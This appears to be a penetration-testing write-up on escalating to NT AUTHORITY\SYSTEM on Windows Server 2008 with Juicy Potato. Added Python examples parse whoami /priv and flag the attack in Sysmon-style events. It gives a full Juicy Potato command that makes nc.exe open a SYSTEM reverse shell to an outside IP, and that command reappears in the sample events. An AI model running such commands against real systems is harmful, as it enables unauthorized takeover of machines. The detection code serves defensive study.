Privilege Escalation

First thing I did was look for a way to improve my netcat shell, which is something I immediately do with Linux machines as well. As soon as I get a foothold I use socat to get an improved shell.

For that I checked the architecture of the machine so I could generate a Meterpreter payload, just in case things go south and I need Metasploit's modules to check for kernel exploits when I cannot figure it out on my own.

After improving my shell I checked the permissions and the privileges this user had, and boom.

This is easy money because we can impersonate services that are running as NT AUTHORITY\SYSTEM and get a shell with that level of access.
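The check behind that "boom" is the privilege list of the current token: the Potato family needs SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege to be held, which is also what a defender should audit on service and application-pool accounts. The following Python is an added example (not from the original post or the Juicy Potato project) that parses `whoami /priv` output and reports which of those two privileges the token holds; the sample output is constructed for this example, not captured from the machine in the write-up.

```python
"""Parse `whoami /priv` output and report whether the token holds the
impersonation privileges the Potato techniques rely on.
Added example; the sample output is constructed, not from the post."""

# The two token privileges that make Potato-style impersonation possible.
POTATO_PRIVILEGES = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")

# Constructed sample in the exact layout `whoami /priv` prints.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_whoami_priv(text: str) -> dict[str, str]:
    """Return {privilege_name: state} from `whoami /priv` output.

    Rows follow the '====' separator line.  The description column can be
    separated from its neighbours by a single space, so we cannot split on
    column gaps; instead the first token is the name and the last is the state.
    """
    privs: dict[str, str] = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("="):
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        parts = line.split()
        if len(parts) < 2 or not parts[0].startswith("Se"):
            continue
        privs[parts[0]] = parts[-1]
    return privs


def potato_preconditions(privs: dict[str, str]) -> list[str]:
    """Privileges from the Potato set that the token holds.

    A privilege listed as Disabled is still present in the token and can be
    enabled by the process itself, so both states count as "held".
    """
    return [p for p in POTATO_PRIVILEGES if p in privs]


if __name__ == "__main__":
    held = potato_preconditions(parse_whoami_priv(SAMPLE_WHOAMI_PRIV))
    if held:
        print("Token holds impersonation privilege(s):", ", ".join(held))
    else:
        print("No Potato-relevant privileges in this token")
```

To use it on a real box, pipe the output of `whoami /priv` into `parse_whoami_priv`; on the constructed sample it reports SeImpersonatePrivilege as held.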

I present to you Juicy Potato.

First things first: we upload nc.exe to the machine. I am sure you can use an msfvenom-generated payload, but I would rather stick to the way I learned how to do this attack.

The credits go to ElevateCyber on YouTube.

Based on the earlier enumeration, we figure out what version of Windows we are on.

Based on the previous command we can see that we are on a Windows Server 2008 machine. Hence we follow this link to get the CLSID of the service we wish to impersonate.

We note the CLSID, and bear in mind that if the first one doesn't work, try the others until one of them does.

Now upload this binary to the Windows machine.

Then run the following command, and listen on whichever port you tell nc.exe to connect back to.

Juicy.Potato.x86.exe -t * -l 1337 -c "{03ca98d6-ff5d-49b8-abc6-03dd84127020}" -p C:\Windows\System32\cmd.exe -a "/c C:\Users\jill\Documents\nc.exe -e cmd.exe 192.168.119.231 33123"
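From the defender's side, the telltale of this step in process telemetry is the last link of the chain: a cmd.exe that runs as NT AUTHORITY\SYSTEM while its parent process (the Potato binary) ran as an ordinary user, plus the nc.exe `-e` argument carried on the command line. The following Python is an added example, not code from the post or the Juicy Potato project, that applies those two rules to constructed Sysmon Event ID 1-style records. Field names follow Sysmon's User, ParentUser, Image, ParentImage and CommandLine; the domain name LAB, the svchost and explorer records, and every path not taken from the command above are constructed for the example.

```python
"""Detection sketch: flag process-creation events where the child runs as a
service-class account while its parent ran as an ordinary user, and events
whose command line carries the netcat `-e` execute flag.
The records are constructed in the shape of Sysmon Event ID 1; they are not
real telemetry.  Added example, not from the post or the Juicy Potato project."""
import re

# Accounts that a Potato-style primary token ends up as.
SERVICE_ACCOUNTS = {
    "NT AUTHORITY\\SYSTEM",
    "NT AUTHORITY\\LOCAL SERVICE",
    "NT AUTHORITY\\NETWORK SERVICE",
}

# nc.exe / nc64.exe invoked with -e (execute a program after connecting).
NC_EXEC_PATTERN = re.compile(r"\bnc(?:64)?\.exe\b.*\s-e\s", re.IGNORECASE)


def classify_event(event: dict) -> list[str]:
    """Return the reasons this event is suspicious (empty list = benign)."""
    reasons = []
    child_user = event.get("User", "").upper()
    parent_user = event.get("ParentUser", "").upper()
    # A user-level parent handing a SYSTEM token to its child is rare for
    # legitimate software: service starts go through services.exe, which
    # itself runs as SYSTEM and therefore does not trip this rule.
    if child_user in SERVICE_ACCOUNTS and parent_user and parent_user not in SERVICE_ACCOUNTS:
        reasons.append("system_child_from_user_parent")
    if NC_EXEC_PATTERN.search(event.get("CommandLine", "")):
        reasons.append("netcat_exec_flag")
    return reasons


def find_suspicious(events: list[dict]) -> list[tuple[dict, list[str]]]:
    """Pair every flagged event with the reasons it was flagged."""
    hits = []
    for ev in events:
        reasons = classify_event(ev)
        if reasons:
            hits.append((ev, reasons))
    return hits


# Constructed sample: a normal service start, the Potato binary being launched
# by the low-privilege user, the SYSTEM cmd.exe it spawns, and an ordinary
# cmd.exe opened by the same user.  "LAB" is a constructed domain name.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "User": r"NT AUTHORITY\SYSTEM", "ParentUser": r"NT AUTHORITY\SYSTEM",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"Image": r"C:\Users\jill\Documents\Juicy.Potato.x86.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "User": r"LAB\jill", "ParentUser": r"LAB\jill",
     "CommandLine": r'Juicy.Potato.x86.exe -t * -l 1337 -c "{03ca98d6-ff5d-49b8-abc6-03dd84127020}" -p C:\Windows\System32\cmd.exe -a "/c C:\Users\jill\Documents\nc.exe -e cmd.exe 192.168.119.231 33123"'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\jill\Documents\Juicy.Potato.x86.exe",
     "User": r"NT AUTHORITY\SYSTEM", "ParentUser": r"LAB\jill",
     "CommandLine": r"C:\Windows\System32\cmd.exe /c C:\Users\jill\Documents\nc.exe -e cmd.exe 192.168.119.231 33123"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "User": r"LAB\jill", "ParentUser": r"LAB\jill",
     "CommandLine": r"C:\Windows\System32\cmd.exe"},
]


if __name__ == "__main__":
    for ev, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"{ev['ParentUser']} -> {ev['User']}: {ev['Image']}  [{', '.join(reasons)}]")
```

On the sample, the Potato launch is flagged only for the netcat argument it carries, while the cmd.exe it spawns trips both rules; the service start and the user's own cmd.exe stay clean. The ParentUser field exists in current Sysmon versions; older deployments need to join parent and child events on process id to get the same comparison.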

And we got NT AUTHORITY\SYSTEM.
